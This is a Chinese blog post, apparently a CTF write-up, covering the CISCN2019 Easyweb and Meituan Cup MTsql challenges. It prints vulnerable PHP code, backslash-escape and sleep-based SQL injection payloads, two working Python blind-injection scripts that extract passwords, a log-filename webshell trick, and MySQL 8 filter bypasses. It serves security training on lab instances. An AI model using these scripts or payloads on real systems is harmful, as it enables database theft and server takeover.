由美团杯一道题学习sql注入新姿势

最新推荐文章于 2021-12-16 10:30:47 发布
最新推荐文章于 2021-12-16 10:30:47 发布
阅读量307 收藏 3
点赞数 1
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/117186743
版权

MTsql

登陆界面很好看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

[CISCN2019]Easyweb

目录扫描

在buu上复现的 buu的扫描一直是不成功的 吐了。。。
随手输了个 robots.txt 发现东西

User-agent: *
Disallow: *.php.bak

在image.php.bak中发现东西

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

哦哦哦
这里貌似在注入图片选择??
既然给了这个选图片的代码 说明应该是个sql注入没跑了

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

  • 单引号(’)
  • 双引号(")
  • 反斜杠(\)
  • NULL

会过滤 ' 得考虑一下如何绕过 总得闭合
想构造以下的payload 只要出现奇数个 \ 就可以实现注入

select * from images where id='\' or path='   payload  #'

试了很多次 用\0 \\0可以实现 写脚本的时候要多加一个\

不知道为什么我只让他睡1s 实际却睡了3.93s 奇怪

http://32589a3a-a9ea-4784-908b-eefba1d6f8f3.node3.buuoj.cn/image.php?id=\\0&path=%20or%20sleep(1)%23

于是开始注入 这里直接飞脚本
注意 最初 我想用下面的语句爆表名 后来百思不得其姐 。。。 原来是因为过滤了' 被我忘了。。。
用16进制绕过

SELECT  table_name FROM information_schema.tables WHERE table_schema = 'ciscnfinal'

正解

import requests
import time

url = "http://32589a3a-a9ea-4784-908b-eefba1d6f8f3.node3.buuoj.cn/image.php?id=\\0&path="
def check(text):
    if "JFIF" in text:
        return 1
    else:
        return 0
# payload
# select * from images where id='\' or path='   payload  #'
#051c24692de2ece98b53
result = ""
for i in range(0,50):
    high = 123
    low = 33
    mid = (high + low) // 2
    while high > low:
        #payload = " or id=if(ord(substr((select password from users limit 1 offset 0),{},1))>{},1,0)%23".format(i + 1, mid)
        #payload = " or id=if(ord(substr((select column_name from information_schema.columns where table_schema= 0x636973636e66696e616c and table_name = 0x7573657273 limit 0,1),{},1))>{},1,0)%23".format(i + 1,mid)
        #payload = " or id=if(ord(substr((select username from users limit 1 offset 0),{},1))>{},1,0)%23".format(i + 1, mid)
        payload = " or id=if(ord(substr((select password from users limit 1 offset 0),{},1))>{},1,0)%23".format(i + 1,
                                                                                                                mid)
        u = url + payload
        res = requests.get(u)
        time.sleep(0.1)
        print(u)
        print("===================================")
        if check(res.text) == 1:  # 说明大于
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    print(mid)
    result += chr(mid)
    print(result)

登录进去后是一个文件上传
随便传一个 .htaccess 进去试一下

I logged the file name you uploaded to logs/upload.e63e6b133a4b2d5eb2fe1165bdce7313.log.php. LOL

中间那串32位应该是md5
emm…
日志在哪/
看看
额。。。forbidden了/logs/ 差点以为读不到了 还好根目录可以读

/logs/upload.e63e6b133a4b2d5eb2fe1165bdce7313.log.php

本来想搞点骚操作的
结果发现不知道上传的传哪去了
只有一个记录文件名的 日志
但这日志是php 严重怀疑是出题人故意的
可以利用文件名上传
之后"一键"连接
结束战斗

回到MTsql

这里给出ha1神的脚本 与上题思路基本一致 但由于过滤较为严格 所以用正则匹配来注入
这里爆库我是不会 估计盲猜 users表 咳咳 毕竟select 和 handler都ban了

import requests as req
import time

def ord2hex(string):
  result = ''
  for i in string:
    result += hex(ord(i))

  result = result.replace('0x','')
  return '0x'+result


url = "http://eci-2ze7bgvjvxtgmki6mtcj.cloudeci1.ichunqiu.com/index.php"
string = [ord(i) for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_']
headers = {
      'User-Agent':'Mozilla/5.0 (Windows NT 6.2; rv:16.0) Gecko/20100101 Firefox/16.0',
      'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
      'Connection':'keep-alive'
    }

res = ''
for i in range(50):
  for j in string:
    passwd = ord2hex('^'+res+chr(j))
    # print(passwd)
    passwd = '||case/**/when/**/password/**/regexp/**/binary/**/{}/**/then/**/sleep(3)/**/else/**/1111111/**/end/**/#'.format(passwd)
    #print(passwd)
    data = {
      'username':"admin\\",
      'password':passwd
    }
    before_time = time.time()
    r = req.post(url, data=data, headers=headers)
    after_time = time.time()
    #print( r.text)
    offset = after_time - before_time
    # print(offset)
    if (offset > 2):
      print(passwd)
      res += chr(j)
      print(res)
      break
#password This_1s_thE_Passw0rd

拓展一下

除了select 和 handler 还有其他方法查询吗

mysql8有注入新特性 TABLE 可代替select
mysql8新特性

values

VALUES row_constructor_list [ORDER BY column_designator] [LIMIT BY number]

row_constructor_list:
    ROW(value_list)[, ROW(value_list)][, ...]

value_list:
    value[, value][, ...]

column_designator:
    column_index

可用来判断列数 列数不对会报错

select * from users where id = 1 union values row(1,2,3)
b1ue0cean
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
2021美团A.数据结构
cjlu zx的博客
07-14 339
:2021美团A.数据结构 比赛一开始看到不同数个数,张口主席树求区间不同数个数瞬间带歪队友,自己也在错误的道路上越走越远。 在中后期重阅读面发现每次询问的是全局不同数的个数,想到了最多只有n+1n+1n+1个数,对于每一次询问,我去计算有多少数会被删除,有多少数会被增加。无奈刷少了,没想到统计不出现数的个数。 思路 彩蛋:学习了邓老师的代码,结果在看他代码的时候发现了一个手误情况,直接手造hack数据给了jls,成为了热心网友hack了邓老师,邓老师AK IOI,那么我hack邓老师,四舍五入
SQL注入姿势
cyjmosthandsome的博客
03-02 600
一、双等号绕过 例:http://ctf5.shiyanbar.com/web/wonderkun/web/index.html(登陆一下好吗) payload:username=a'='&amp;password=a'=' username=a'='0&amp;password=a'='0 解析: 后端PHP代码应该为:select ** fro...
有关sql注入
Liz的博客
03-20 186
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。[1]比如先前的很多影视网站泄露VIP会员密码大多就是通...
对于xss和sql注入的防范(美团网站xss例子)
DEBUG
12-07 847
对于xss和sql注入这样的漏洞有很多工具是可以检测的。 也是最常见的web安全。 其实这样的问是很好避免的 只要在应用架构上 统一数据的吞吐,在吞吐的过程中做好数据的校验就ok了 最简单的php的 htmlspecialchars  就可以把一些危险字符进行转译 就可以大大减低xss和sql注入的可能性 也可以结合其他的函数进行更全面的过滤 http://blog.csdn.n
#529. 【美团2020】114514【贪心】
既然弱小,就只顾变强就是了
05-21 445
目链接 目给出的条件是给出一个长度不超过6e5的串,它一定是由n个“114514”组成的长度为6n的串。114514的顺序一定是按照这个顺序,但是排列可以是错综复杂的,但是保证一定有解。 一个“114514”中有两个‘4’,这是很关键的,我们可以把原式拆成11(4a)51(4b)这样的形式,4a指的是出现于前面的4,4b指的是出现于后面的4。于是我们想根据(4a)、(4b)确定这个串的组合。 如果我们确定了4a、4b,那么首先就可以确定5了,从后往前,第i个4a对应第i个4b对应第i个...
基于Python的机器学习检测SQL注入.zip
最新发布
03-03
基于Python的机器学习检测SQL注入.zip 本项目是使用机器学习算法来分类SQL注入语句与正常语句: 使用了SVM,Adaboost,决策树,随机森林,逻辑斯蒂回归,KNN,贝叶斯等算法分别对SQL注入语句与正常语句进行分类。 ...
SQL.rar_sql注入_网络安全_网络安全
09-20
这个是对网络安全 方面防SQL注入的总结
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
MySQL 面试-SQL注入篇.docx
09-17
SQL注入是一种严重的网络安全威胁,尤其针对使用MySQL等数据库系统的Web应用程序。攻击者通过在用户输入的数据中插入恶意SQL代码,可以操控数据库,获取敏感信息,甚至破坏整个系统。以下是关于SQL注入的详细解释和...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
美团2020:查查查乐乐(dp)
你数过天上的星星吗
05-17 833
A. 【美团2020】查查查乐乐 “查查查乐乐”是一段古老神秘的咒语,只有被选中的魔法师才有资格使用这一段咒语并享用它所带来的力量;而如果这段咒语出现在了不具资格的魔法师的口中,这个魔法师将会遭到咒语的反噬并付出可怕的代价。 这个学期,镁团在一家魔法早教学校做兼职,他的任务是教小学生们魔法并帮助他们准备一年一度的全国魔法奥林匹克竞赛 (NOMP)。今天,镁团在整理图书的时候,突然发现一本课外教材中包含了 t 段只由查和乐组成的咒语。让小学生们阅读这些咒语是非常危险的:他们可能会在无意识中念出“查查查乐乐”
美团2020 查查查乐乐 dp
hhhcbw的博客,欢迎各位来访
05-19 933
**目链接:**http://uoj.ac/problem/519 **目背景:**美团的签到,蒟蒻的我不会做QAQ。。。 目大意: 给定一个字符串s,只含有字符‘x’和‘l’,你可以将’x’变成’l’,也可以‘l’变成’x’,问你字符串删去任意个字符都不会出现子串’xxxll’,至少需要变换几次。 解思路: 小数据:n<=10,暴力枚举即可。 大数据:n<=100,比赛的时候想的是贪心,但是‘x’变‘l’会对之前的串产生影响,’l’变‘x’会对之后的串产生影响。所以并不能把问的最
mysql安装教程
愿世界和平
09-18 26万+
MySQL针对不同的用户提供了2中不同的版本: MySQL Community Server:社区版。由MySQL开源社区开发者和爱好者提供技术支持,对开发者开放源代码并提供免费下载。 MySQL Enterprise Server:企业版。包括最全面的高级功能和管理工具,不过对用户收费。 下面讲到的MySQL安装都是以免费开源的社区版为基础。打开MySQL数据库官网的下载地址http://dev.
## MTSQL修改数据和删除数据
qq_46924416的博客
10-11 217
MTSQL修改数据和删除数据 将查询结果插入表中 修改数据 删除数据 (1)将查询结果插入表中 前面我有写过,在表中插入一行或多行数据用insert into 表名 values(值1,值2 ...) 那么将查询到的结果直接导入表中该用什么语句呢 insert into 要加入的表的名字 select * from 要查询的表的名字 where 条件; 举例: insert into student1 select * from student2 where sex="nv" (2)修改数据 upd
mtsql基础知识
渣渣灰
03-07 939
数据类型 可以通过查看帮助文档查阅所有支持的数据类型 使用数据类型的原则是:够用就行,尽量使用取值范围小的,而不用大的,这样可以更多的节省存储空间 常用数据类型如下: 整数:int,bit 小数:decimal 字符串:varchar,char 日期时间: date, time, datetime 枚举类型(enum) 特别说明的类型如下: decimal表示浮点数,如deci...
超详细MySQL安装及基本使用教程
热门推荐
theLostLamb的博客
12-13 39万+
一、下载MySQL首先,去数据库的官网http://www.mysql.com下载MySQL。点击进入后的首页如下: 然后点击downloads,community,选择MySQL Community Server。如下图: 滑到下面,找到Recommended Download,然后点击go to download page。如下图: 点击download进入下载页面选择No thanks,
Mysql简介
礁之的博客
12-16 1万+
文章目录一、数据库概述(1)数据库概述(2)数据库的分类二、Mysql概述(1)Mysql概述(2)Mysql的存储原理(3)使用cmake编译mysql参数说明(4)Mysql自带的四个数据库三、安装Mysql(1)实验环境(2)实验步骤四、SQL语句概述(1)什么是SQL(2)SQL语句分类(3)数据类型(4)使用SQL语句-查看所有数据库-创建库,查看库信息-查看表,创建表-表的重命名-修改表的属性、格式-添加表的字段(项)-删除表的字段(项)-修改表的字段和类型-修改表的字段类型和顺序-删除表和库-
一篇文章弄懂mysql8特性注入
蚁景网安学院
11-16 919
前言最近打比赛的时候遇到了mysql8的知识点,这里就从环境搭建开始到注入一起一步步慢慢学习。环境搭建我这里是用docker在服务器上拉的,然后用navicat来看的下载docker pu...
美团2020】半前缀计数
Jy_poi
05-18 220
美团2020】半前缀计数 意:定义半前缀是 s[1:i]+s[j:k]s[1:i]+s[j:k]s[1:i]+s[j:k], 其中 0≤i<len(s),i<j≤len(s),j−1≤k≤len(s)0≤i<len(s),i<j≤len(s),j−1≤k≤len(s)0≤i<len(s),i<j≤len(s),j−1≤k≤len(s)。直观上来说,你可以把半前缀理解成某一个前缀 s[1:k] 删除掉某一个子串后形成的结果(当然也允许不删)。 给出字符串 s,你需要求
可以给我一些学习sql注入的途径吗
03-22
然而,如果您是一名安全研究人员或者想要学习如何保护自己的网站免受 SQL 注入攻击,那么您可以通过以下途径学习 SQL 注入: 1. 在线教程和课程:有很多在线课程和教程可以帮助您学习 SQL 注入的基础知识和技术。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值